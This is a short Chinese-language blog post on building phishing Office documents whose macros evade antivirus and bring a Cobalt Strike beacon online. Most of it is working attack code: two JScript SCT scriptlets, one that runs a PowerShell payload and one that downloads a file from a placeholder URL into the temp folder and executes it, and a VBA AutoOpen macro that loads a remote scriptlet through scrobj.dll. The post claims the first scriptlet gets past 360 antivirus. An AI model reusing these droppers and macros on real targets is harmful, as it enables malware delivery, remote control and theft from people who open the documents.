文档钓鱼-宏免杀上线

前言

突然要研究,没啥技术含量
photo_2021-04-16_23-59-49.jpg

使用

远程部署一个sct

<?XML version="1.0"?>
<scriptlet>
<registration
  progid="TESTING"
  classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
  <script language="JScript">
    <![CDATA[
      var foo = new ActiveXObject("WScript.Shell").Run("powershell的cs马");
    ]]>
</script>
</registration>
</scriptlet>

这个只能过360,我也不知道为啥它不拦,但是总之他就是不拦截。。。
以及过其他的。

<?XML version="1.0"?>
<scriptlet>
<registration
  progid="TESTING"
  classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
  <script language="JScript">
    <![CDATA[
        var WSHShell = new ActiveXObject("WScript.Shell");
path = WSHShell.ExpandEnvironmentStrings("%temp%");
var filepath = path+"/asdqq";
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
xhr.open("GET","你的免杀马", false);
xhr.send();
if (xhr.Status == 200) {
        var fso = new ActiveXObject("Scripting.FileSystemObject");
        var stream = new ActiveXObject("ADODB.Stream");
        stream.Open();
        stream.Type = 1;
        stream.Write(xhr.ResponseBody);
        stream.Position = 0;
    if (fso.FileExists(filepath)){
       fso.DeleteFile(filepath);
    }
        stream.SaveToFile(filepath);
        stream.Close();
        new ActiveXObject("WScript.Shell").Exec(filepath);
}
    ]]>
</script>
</registration>
</scriptlet>

用上面这个方法,目标开了宏就能过了。

直接给宏添加

Private Declare Function DllInstall Lib "scrobj.dll" (ByVal bInstall As Boolean, ByRef pszCmdLine As Any) As Long

Sub AutoOpen()
    DllInstall False, ByVal StrPtr("你的远程sct地址") ' False = "Don't install"
End Sub
Tags: 免杀, cs,